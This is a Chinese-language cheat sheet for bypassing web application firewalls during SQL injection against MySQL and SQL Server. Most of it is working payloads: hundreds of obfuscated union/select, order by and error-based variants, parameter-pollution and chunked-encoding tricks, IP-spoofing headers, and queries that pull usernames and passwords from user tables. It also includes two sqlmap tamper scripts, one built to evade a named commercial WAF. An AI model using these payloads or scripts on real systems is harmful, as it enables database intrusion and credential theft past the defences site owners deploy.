BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBB&id=1' union select null,concat_ws(char(32,58,32),user,password) from users%23

绕过方式2:函数分隔符绕过(mysql)
规则缺陷/特性:函数与括号之间插入分隔符可以正常执行
对基于正则表达式的WAF,我们猜测安全工程师写WAF规则时,可能不知道函数名与左括号之间可以存在特殊字符,或者遗漏可以存在特殊字符。例如匹配函数”concat()”的规则写法,“concat(”或者”concat\s*(”,就没有考虑到一些特殊字符。相应的绕过方法,在特殊位置引入特殊的分隔符,逐个测试。这些特殊分隔符发现也是通过Fuzz出来的。
绕过技巧:•函数与括号之间可以插入空白符或多行注释达到绕过•GET型请求转POST型
id=-1' union select null,concat_ws(char%0a%0d(32,58,32),user,password) from users #

绕过方式3:协议未覆盖绕过(mysql)
文件头的属性是传输前对提交的数据进行编码发送到服务器。其中 multipart/form-data 表示该数据被编码为一条消息,页上的每个控件对应消息中的一个部分。所以,当 waf 没有规则匹配该协议传输的数据时可被绕过。
绕过技巧:在 http 头里的 Content-Type 提交表单支持四种协议:
Content-Type: text/html;
Content-Type: application/json;charset:utf-8;
Content-Type:type/subtype ;parameter
Content-Type:application/x-www-form-urlencoded
Content-Type:multipart/form-data
使用表单请求中的multipart/form-data•关键词换行•GET型请求转POST型

id=-1' union select null,concat_ws

(char(32,58,32),user,password) 

from users #

绕过方式4:多行注释符替换绕过(mysql)
select/**/*/**/from/**/[dbo].[User]/**/where id=1

绕过方式5:HPP分割参数绕过(sqlserver)
绕过原理规则缺陷/特性:HTTP参数污染
HPP是HTTP Parameter Pollution的缩写,意为HTTP参数污染。
在ASPX中,有一个比较特殊的HPP特性,当GET/POST/COOKIE同时提交的参数id,服务端接收参数id的顺序GET,POST,COOKIE,中间通过逗号链接,于是就有了这个idea。
UNION、SELECT、FROM 三个关键字分别放在GET/POST/COOKIE的位置,通过ASPX的这个特性连起来,堪称完美的一个姿势,压根不好防。
但姿势利用太过于局限:使用Request.Params["id"]来获取参数,G-P-C获取到参数拼接起来,仅仅作为Bypass分享一种思路而已。
绕过技巧:•GET型请求转POST型•参数传递的顺序:GET->POST->COOKIE•使用多行注释符/**/来闭合分割参数的逗号
post方式 id=get,cookie里面 id=cookie, 包里面 id=post
get 方式 id=11111111111111&id=')+and+1=db_name()--+-  双写id

绕过方式6:chunked
普通的sqlmap是没有--chunk这个参数可以使用的  sqlmap  --tamper=chunkedtamper.py
chunkedtamper.py:内容
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time    : 2019/3/12 5:45 PM
# @Author  : w8ay
# @File    : chunk.py

"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.enums import PRIORITY
from random import sample

__priority__ = PRIORITY.NORMAL  # tamper priority; PRIORITY comes from the lib.core.enums import above


def dependencies():
    """Dependency hook with nothing to declare; returns None."""
    return None


def randomIP():
    """Return a dotted-quad string of four distinct integers in 1..254.

    Redraws the whole quad until the first value is none of 10, 172 or 192.
    Not referenced by tamper() in this file.
    """
    octets = sample(range(1, 255), 4)
    while octets[0] in (10, 172, 192):
        octets = sample(range(1, 255), 4)
    return '.'.join(map(str, octets))


def tamper(payload, **kwargs):
    """Mark the request as chunked and return a fixed chunked body.

    Sets ``Transfer-Encoding: Chunked`` on the ``headers`` mapping passed in
    ``kwargs`` (mutated in place; a throwaway dict is used when absent),
    echoes the incoming ``payload`` to stdout, and returns the constant body
    ``"\\r\\n2\\r\\nid\\r\\n0\\r\\n\\r\\n"``.  The payload itself never reaches
    the return value; the pass-through return is left commented out.
    """
    headers = kwargs.get("headers", {})
    headers["Transfer-Encoding"] = "Chunked"
    print("tamper")
    print(payload)
    # return payload
    # One 2-byte chunk holding "id", then the zero-length terminating chunk.
    return "\r\n".join(["", "2", "id", "0", "", ""])


绕过方式7:ip伪造头
X-Forwarded-For:127.0.0.1
X-Forwarded-Host:127.0.0.1
X-Client-IP:127.0.0.1
X-remote-IP:127.0.0.1
X-remote-addr:127.0.0.1
True-Client-IP:127.0.0.1
X-Client-IP:127.0.0.1
Client-IP:127.0.0.1
X-Real-IP:127.0.0.1

绕过方式8:利用multipart/form-data 绕过
http 头里的Content-Type 提交表单支持三种协议
application/x-www-form-urlencoded 编码模式post 提交
multipart/form-data 文件上传模式
text/plain 文本模式
Content-Type: multipart/form-data;
boundary=---------------------------28566904301101419271642457175
boundary 这是用来匹配的值
Content-Disposition: form-data; name="id" 这也能作为post 提交
所以程序会接收到构造的SQL 注入语句-1 union select 1,user()


绕过方式9:url二次编码绕过

绕过方式10:白名单绕过。
白名单通常有目录
/admin
/phpmyadmin
/admin.php
/index.php/1.jpg&id=1
/index.php/1.jpg=/1.jpg&id=1
/1.css=/1.css&id=1

绕过方式11:pipline 绕过注入
用burpsuite 抓包提交复制整个包信息放在第一个包最后,把第一个包close 改成keep-alive 把
burpsuite 自动更新Content-Length 勾去掉。

漏洞12:post,OPTIONS,HEAD绕过
有些waf 只要存在GET 或者POST 优先匹配POST 从而导致被绕过。
有些程序是json 提交参数,程序也是json 接收再拼接到SQL 执行json 格式通常不会被拦截。所以可以绕过waf.
{'id':1 union select 1,2,3,'submit':1}
同样text/xml 也不会被拦截
POST GET传数据都会被waf拦截,将请求方式修改为OPTIONS,HEAD等成功绕过了waf

漏洞13: 花扩号绕过
select 1,2 union select{x 1},user()

漏洞14:HTTP 数据编码绕过
改Content-Type 中的charset 的参数值,我们改为ibm037 这个协议编码
Content-Type: application/x-www-form-urlencoded;charset:ibm037
未编码
id=123&pass=pass%3d1
透过IBM037 编码
%89%84=%F1%F2%F3&%97%81%A2%A2=%97%81%A2%A2~%F1


1.  and 绕过

使用 || 代替 or
使用&&代替and
&& 1=1
&& 1=2
|| 1=0
|| 1=1
+or+0x3a!=1--+
+or+0x3a=1--+
and (select 1)=(Select 0x1)
and (select 1)=(Select 0xA*1000)
and ~1>1
and 1=1
and 1=2
and -2<-1
and hex(1)>~1
and hex(1)>-1
and true=true --+
and!!!!1=1
and/*@%$^(*/ 1=1
or 1=0
or 1=1

2.  order by 绕过
/&id=1308%20order%20by%2035&b=/
into @a,@b,@c,@d;
order /*//--/*/ by
Order%A0By
order/**/by
order/*--*/by
order/*//*/by
order/**/by

3.  union select  绕过
%09union%09select 1,2
%0aunion%0aselect 1,2
%0baunion%0bselect 1,2
%0caunion%0cselect 1,2
%0d%0aunion%0d%0aselect 1,2
%0daunion%0dselect 1,2
--%0dunion select
%23?%0auion%20?%23?%0aselect   
%23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect   
%23x%0A/*!database*/()
%25%37%35%25%36%45%25%36%39%25%36%46%25%36%45%25%32%30%25%37%33%25%36%35%25%36%43%25%36%35%25%36%33%25%37%34
%250aunion%250aselect 1,2
%252f%252a*/union%252f%252a /select%252f%252a*/ 
%2f**%2funion%2f**%2fselect 
%2f**%2funion%2f**%2fselect%2f**%2f 
%53eLEct
%55nion %53eLEct   
%55nion(%53elect 1,2,3)-- - 
%55nion(%53elect)
%75%6e%6f%69%6e %61%6c%6c %73%65%6c%65%63%7
(select 1)=(select 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA)/*!union*/
*9e0UnIoN
*9e0UnIoN*9e0slect
/%2A%2A/union/%2A%2A/select/%2A%2A/
/* */union/* */select/ */1,2;
/*!%53eLEct*/
/*!%55NiOn*/ /*!%53eLEct*/ 
/*!12345union*//*!12345select*/1,2;
/*!40000union*//*!40000select*/1,2
/*!50000UniON SeLeCt*/ 
/*!50000union*//*!50000select*/1,2
/*!select*/
/*!u%6eion*/ /*!se%6cect*/ 
/*!uNIOn*/ /*!SelECt*/ 
/*!union*//*!00000all*//*!00000select*/1,2
/*!union*//*!select*/1,2
/*!union*/+/*!select*/ 
/*!UnIoN*/SeLecT+  
/**//*!12345UNION SELECT*//**/ 
/**//*!50000UNION SELECT*//**/ 
/**//*!union*//**//*!select*//**/ 
/**/UNION/**//*!50000SELECT*//**/ 
/**/union/**/select/**/ 
/*--*/union/*--*/select/*--*/ 
/*中文*/union/*中文*/select/*中文*/1,2;
\Nselect
\Nunion
+#1q%0AuNiOn all#qa%0A#%0AsEleCt 
+#uNiOn+#sEleCt 
--+%0d%0aunion--+%0d%0aselect--+%0d%0a1,--+%0d%0a2
+un/**/ion+se/**/lect 
+uni%0bon+se%0blect+ 
+UnIOn%0d%0aSeleCt%0d%0a 
+union+distinct+select+ 
+union+distinctROW+select+ 
+UNunionION+SEselectLECT+ 
and(select 1)=(Select 0xA*1000)/*!uNIOn*//*!SeLECt*/ 1,user()
e0union(select!1,)
e0union(select(1),(select user from user limit 1)
e0union(select(1),)
e0union(select/!50000/1,)
e0union(select@'id',)
e0union(select{1},)
e0union(select~1,)
e0union(select+1,)
e0union(select'1',(select user from user limit 1)
e0union(select'1',)
e0union(select-1,)
null+UNION+SELECT+1,2
REVERSE(noinu)+REVERSE(tceles) 
s%u0065lect
se%0blect
sel%e%ct
sele%ct
sele/**/ct
select union select{x 1},
u%6eion s%65lect
u%6eion se%6cect   
un?+un/**/ion+se/**/lect+
uni%0bon+se%0blect 
uni%6fn distinct%52OW s%65lect
uni%u006fn sel%u0065ct
unio%6e %73elect   
unio%6e%20%64istinc%74%20%73elect   
union  -- 1%0a select
union  -- hex()%0a select
union %23%0aall select
union (/*!/**/ SeleCT */ 1,2,3) 
union (select)
union /*!50000%53elect*/ 
union /*//--/*/ select
union /*@%$^(*/ select 
union /*@%$^(*/ select --+
union all select
union all select 1,2
union all%23%0a select
union DISTINCT select
union DISTINCT select 1,2
UnIoN SeLeCt
union select * from (select 1)a join (select 2)b join(select user())c join(select 4)d******;
union select 1,(select(schema_name)from(information_schema.SCHEMATA)limit 0,1)
union select 1,(select(schema_name)from/*!12345information_schema.SCHEMATA*/limit 0,1)
union select 1,(select(schema_name)from{x information_schema.SCHEMATA}limit 0,1)
uNIoN sELecT 1,2
union select all
union select DISTINCT
union%20%64istinctRO%57%20select   
union%20/*!44509select*/%20
union%2053elect   
union%20all%23%0a%20select%20
union%20distinct%20select   
union%20select%20
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A 
union%a0%0aselect 1,'2',
union%a0%0aselect 1,'2','3',
union(select%0aall{x users}from{x ddd})
union(select%0adistinct{x users}from{x ddd})
union(select%0adistinctrow{x users}from{x ddd})
union/*!23000select*/
union/*%00*/%23a%0A/*!/*!select
union/*%00*/%23a%0A/*!/*!select%20
union/*%0a%0b%20%a0--*/select
UNION/*&test=1*/SELECT/*&pwn=2*/ 
union/*&username=*/select
union/**/select/**/1,2
union/*/!*!**/select
union/*/!--**/select
UNION/*/%21*%21**/SELECT
union/*/-*!!*/select
union/*//\\\*/select+1,2--+
union/*//--\\\*/select+1,2--+
UNiOn/*/1/*/select
UNiOn--+%02%0d%0aselect    
union+/*!select*/ 
union+distinctROW+select
UNIunionONSeLselectECT
ununionion selselectect
user/**/()--+


 过滤了%23%0a 却不过滤%2d%2d%0a

4.  database() 绕过
%23x%0A/*!database*/()
and+0x3a!=info()--
database /*//--/*/ ()
database%23x%0A()
database()||’
database/*!20553()*/--+
database/**/()
database/*xxx*/()
database+()
db_name()
user/**/()--+


union select+1, (select+password+from+`users`+limit+1)--+
union/*//--//*/select+1,(select+password+from+`users`+limit+1)--
1'||1=geometryCollection(updatexml(1,concat(0x7e,database(),0x7e),1))--+
 UnIoN%A0SeLeCT*FrOm(SeLeCt 1)a JOIN (SeLeCt 2)b JOIN (SeLeCt 3)c JOIN (SeLeCt 4)d JOIN (SeLeCt 5)e JOIN (SeLeCt 6)f JOIN (SeLeCt 7)g JOIN (SeLeCt 8)h JOIN (SeLeCt 9)i JOIN (SeLeCt 10)j JOIN (SeLeCt 11)k JOIN (SeLeCt 12)l JOIN (SeLeCt 13)m JOIN (SeLeCt 14)n JOIN (SeLeCt 15)o JOIN (SeLeCt 16)p JOIN (SeLeCt 17)q JOIN (SeLeCt 18)r JOIN (SeLeCt 19)s JOIN (SeLeCt 20)t JOIN (SeLeCt 21)w JOIN (SeLeCt 22)x JOIN (SeLeCt 23)y JOIN (SeLeCt 24)z JOIN (SeLeCt 25)2a-- -

5.  from    绕过
%23%0afrom
%2d%2d%0afrom
%2d%2d%0from
%a0from
/*!%23/*%0afrom*/
/*!00000%23/*%0afrom*/
/*!from*/
\Nfrom
1efrom
2.0 from
8e0from
CHAR(102, 114, 111, 109)
e0FrOm
FrOFrOmm
FrOm
from/*!--+/*%0ainformation_schema.columns*/
select(1)from
select{x user}from{x mysql.user};

6.  information_schema的绕过
`information_schema`.schemata
`information_schema`.`schemata`
information_schema.`schemata`
(information_schema.schemata)
information_schema/**/.schemata
Information_schema./**_**/Tables

7:单引号绕过'
""      (mysql) 
select * from users where username=0x61646D696E;   #   select * from users where username='admin';   select hex('admin');
库名.表名:admin.users
admin+.user
select{x user}from{x mysql.user};

8.   substr截取字符绕过
查询m 等于select(substr(database() from 1 for 1))页面返回正常
select * from users where id=1 and 'm'=(select(substr(database() from 1 for 1)));
可以进一步优化m 换成hex 0x6D 这样就避免了单引号
select * from users where id=1 and 0x6D=(select(substr(database() from 1 for 1)));

substr 函数被拦截 换成 mid
select * from users where id=1 and 'm'=(select(mid(database() from 1 for 1)));
select * from users where id=1 and 0x6D=(select(mid(database() fm 1 for 1)));

9.  limit拦截
limit 1 默认返回第一条数据。也可以使用limit 1 offset 0 从零开始返回第一条记录.
可以用以下等价函数代替来绕过过滤:
1、sleep函数可以用benchmark函数代替
2、ascii函数可以用hex, bin函数代替
3、group_concat函数可以用concat_ws函数代替
4、updatexml函数可以用extractvalue函数代替
AND 等价于 &&
OR 等价于 ||
= 等价于 like
+ 代替 空格
sleep() 等价于 benchmark()
mid()substring() 等价于 substr()
Mid(version(),1,1)
Substr(version(),1,1)
Substring(version(),1,1)
Lpad(version(),1,1)
Rpad(version(),1,1)
Left(version(),1)
reverse(right(reverse(version()),1)
concat(version(),'|',user());
concat_ws('|',1,2,3)
Char(49)
Substring(@@version,1,1)
Left(@@version,1)
Right(@@version,1)
limit 1 offset 0
mid(version() from 1 for 1)
Hex('a')
Unhex(61)
Ascii(1)
用like或in代替=
select * from user where username='user';
select * from user where username like 'user';
select * from user where username in('user');
and exp(~(select * from(select user())x));--+
and exp(~(select%23%0apassword%23%0afrom(select%23%0auser())x));--+
http://id/index.php?id=1 and 1 like 1
like "[%23]" /*!10440union select*/
试延时 payload,将里面的 o 替换为 %u00ba

7. 普通函数的绕过
如:
'
"
.
`users`
~
hex(user/**/(/**/))
8. 报错注入函数的绕过
/*!5000updatexml*/(1,1,1)
/*!11440updatexml*/(1,1,1)
/*!11441extractvalue*/(1, concat(0x5c, (SELECT @@version)))
`updatexml`(1,(select @@version),1)
总之,将报错函数用/*!*/或者``包括起来。
报错注入中使用polygon()函数替换常用的updatexml()函数select polygon((select * from (select * from (select @@version) f) x));


盲注绕过&延时绕过
and!!!!if((substr((select hex(user/**/(/*!*/))),1,1)>1),sleep/**/(/*!5*/),1)
and!!!!1=1    除了!还可以使用~&-        当符号数量为偶数时为真,相当于一个空格,可以用来绕过and后不能使用数字或者字符。


apache特性:
&id=1&id=2     他只解析最后一个

MySQL特性:
空格可以由其它字符替代

select id,contents,time from news where 
news_id=1①union②select③1,2,username④from⑤admin
•位置①
•可以利用其它控制字符替换空格:%09,%0a,%0b,%0c,%0d,%20,%a0•可以利用注释符号替换空格:/**/、%23est%0d%0a、 --+a%0d%0a•可以利用数学运算以及数据类型:news_id=1.0,news_id=1E0,news_id=\N
•位置②
•可以利用其它控制字符替换空格:%09,%0a,%0b,%0c,%0d,%20,%a0•可以利用注释符号替换空格:/**/、%23test%0d%0a、 --+a%0d%0a•可以利用括号:union(select 1,2)
•位置③
•可以利用其它控制字符替换空格:%09,%0a,%0b,%0c,%0d,%20,%a0•可以利用注释符号替换空格:/**/、%23test%0d%0a、 --+a%0d%0a•可以利用其它符号:+ 、- 、 ~ 、!、@•位置④
•可以利用其它控制字符替换空格:%09,%0a,%0b,%0c,%0d,%20,%a0•可以利用注释符号替换空格:/**/、%23test%0d%0a、 --+a%0d%0a•大括号{}:union select {``1},{x 2}•可利用数学运算以及数据类型:
union select usename,2.0from admin union select username,8e0from admin union select username,\Nfrom admin
•位置⑤
•可以利用其它控制字符替换空格:%09,%0a,%0b,%0c,%0d,%20,%a0•可以利用注释符号替换空格:/**/、%23test%0d%0a、 --+a%0d%0a•反引号`:union select 1,table_name,3 from`information_schema`.`tables`limit 0,1%23•内联注释:union select 1,table_name,3 from /*!50001information_schema.tables*/ limit 0,1%23•大括号{}:union select 1,table_name,3 from{x information_schema.tables}limit 0,1%23•小括号():union select 1,table_name,3 from(information_schema.tables)limit 0,1%23


SQLServer特性
空格可以由其它字符替代

select id,contents,time from news where news_id=1①union②select③1,2,db_name()④from⑤admin

位置①
可以利用其它控制字符替换空格:%01~%0F、%11~%1F
可以利用注释符号:/**/、—+a%0d%0a
可利用数学运算符以及数据类型:news_id=1.0,news_id=1e0,news_id=1-1
位置②
可以利用其它控制字符替换空格:%01~%0F、%11~%1F
可以利用注释符号:/**/、—+a%0d%0a
可以利用加号+替换空格:union+select
位置③
可以利用其它控制字符替换空格:%01~%0F、%11~%1F
可以利用注释符号:/**/、—+a%0d%0a
可利用数学运算符:+、-、~、. (注:其中-、~、.号必须是select查询的第一个字段的数据类型为数字型才能使用)
可以利用小括号()替换空格:select(1),2,db_name()
位置④
可以利用其它控制字符替换空格:%01~%0F、%11~%1F
可以利用注释符号:/**/、—+a%0d%0a
可利用其他字符:%80~%FF(需要IIS服务器支持)
位置⑤
可以利用其它控制字符替换空格:%01~%0F、%11~%1F
可以利用注释符号:/**/、—+a%0d%0a
可利用其他字符:%80~%FF(需要IIS服务器支持)
可以利用点号.替换空格:from.users
可以利用中括号[]替换空格:from[users]


Unicode编码

常用的几个符号的一些Unicode编码:

单引号: %u0027、%u02b9、%u02bc、%u02c8、%u2032、%uff07、%c0%27、%c0%a7、%e0%80%a7
空格:%u0020、%uff00、%c0%20、%c0%a0、%e0%80%a0
左括号:%u0028、%uff08、%c0%28、%c0%a8、%e0%80%a8
右括号:%u0029、%uff09、%c0%29、%c0%a9、%e0%80%a9

​

mysql sqlmap tamper

#!/usr/bin/env python

# MySQLByPassForSafeDog
# Code By:Tas9er

import re
import string
import os
import random

from lib.core.enums import DBMS
from lib.core.common import singleTimeWarnMessage

def dependencies():
    """Dependency hook: emit the one-time warning naming this tamper and DBMS.MYSQL.

    The script name is the file's basename with its extension stripped.
    """
    script_name = os.path.basename(__file__).split(".")[0]
    singleTimeWarnMessage("MySQLByPassForSafeDog / Code By:Tas9er '%s' only %s" % (script_name, DBMS.MYSQL))
    
def tamper(payload, **kwargs):
    """Rewrite MySQL keywords in ``payload`` into comment-wrapped, percent-encoded forms.

    The body is an ordered chain of plain ``str.replace`` calls and the order
    is load-bearing: several later steps match text that earlier steps
    produced, and the last two encode every ``/`` and ``*`` in the result,
    including the comments inserted above them.  ``kwargs`` is accepted for
    the tamper signature but never read.  Returns the rewritten string.
    """
    # %21 is '!' and %26 is '&', so this decodes to the comment /*!44575&&*/.
    payload=payload.replace('AND','/*%2144575%26%26*/')
    # Matches the bare substring 'ORD', which also splits any 'ORDER BY' into
    # '/*%2144575ORD*/ER BY' before the 'ORDER BY' rule below can see it.
    payload=payload.replace('ORD','/*%2144575ORD*/')
    payload=payload.replace('OR ','/*%2144575OR*/ ')
    payload=payload.replace('UNION SELECT','UNION/*/%21*%21**/SELECT')
    # NOTE(review): this pattern can no longer occur -- every 'ORDER BY'
    # contains 'ORD' and was rewritten above; only the caonimabi() call runs.
    payload=payload.replace('ORDER BY',str(caonimabi())+'ORDER/**/BY')
    payload=payload.replace('information_schema.tables','/*!%23%0ainformation_schema.tables*/')
    payload=payload.replace('@','/*%2144575%40*/')
    # %53%45%4c%45%43%54 is 'SELECT' percent-encoded byte by byte.
    payload=payload.replace('SELECT','/*%2144575%53%45%4c%45%43%54*/')
    # caonimabi() is evaluated once per replace call, so every occurrence
    # handled by the same call receives the same random comment.
    payload=payload.replace('table_name',str(caonimabi())+'table_name')
    payload=payload.replace('MID',str(caonimabi())+'MID')
    payload=payload.replace('CAST',str(caonimabi())+'CAST')
    payload=payload.replace('USER()','%23a%0aUSER/*!*/()')
    # The next two lines match the text the 'USER()' rule just produced inside
    # CURRENT_USER() and SESSION_USER() and substitute their own forms.
    payload=payload.replace('CURRENT_%23a%0aUSER/*!*/()',str(caonimabi())+'CURRENT_USER()')
    payload=payload.replace('SESSION_%23a%0aUSER/*!*/()','%23a%0aSESSION_USER()')
    # %28%29 is '()'; this also rewrites the '()' left by the USER() rule above.
    payload=payload.replace('()','/*%2144575%28%29*/')
    payload=payload.replace(' (','/**/(')
    payload=payload.replace(',(',',/**/(')
    payload=payload.replace('),',')/**/,')
    payload=payload.replace(') ',')/**/')
    # Final pass: percent-encode every '/' and '*' in the whole string, which
    # turns all of the comments inserted above into %2F%2A...%2A%2F sequences
    # and also encodes any '/' or '*' the input payload already contained.
    payload=payload.replace('/','%2F')
    payload=payload.replace('*','%2A')
    return payload
    
def caonimabi():
    """Return a random inline comment of the form ``/*Tas9er<3-9 chars>*/``.

    The filler is sampled without replacement from ASCII letters and digits,
    so no character repeats within one comment; the width is drawn with
    ``random.randint(3, 9)``.
    """
    alphabet = string.ascii_letters + string.digits
    width = random.randint(3, 9)
    filler = ''.join(random.sample(alphabet, width))
    return '/*Tas9er' + filler + '*/'
    
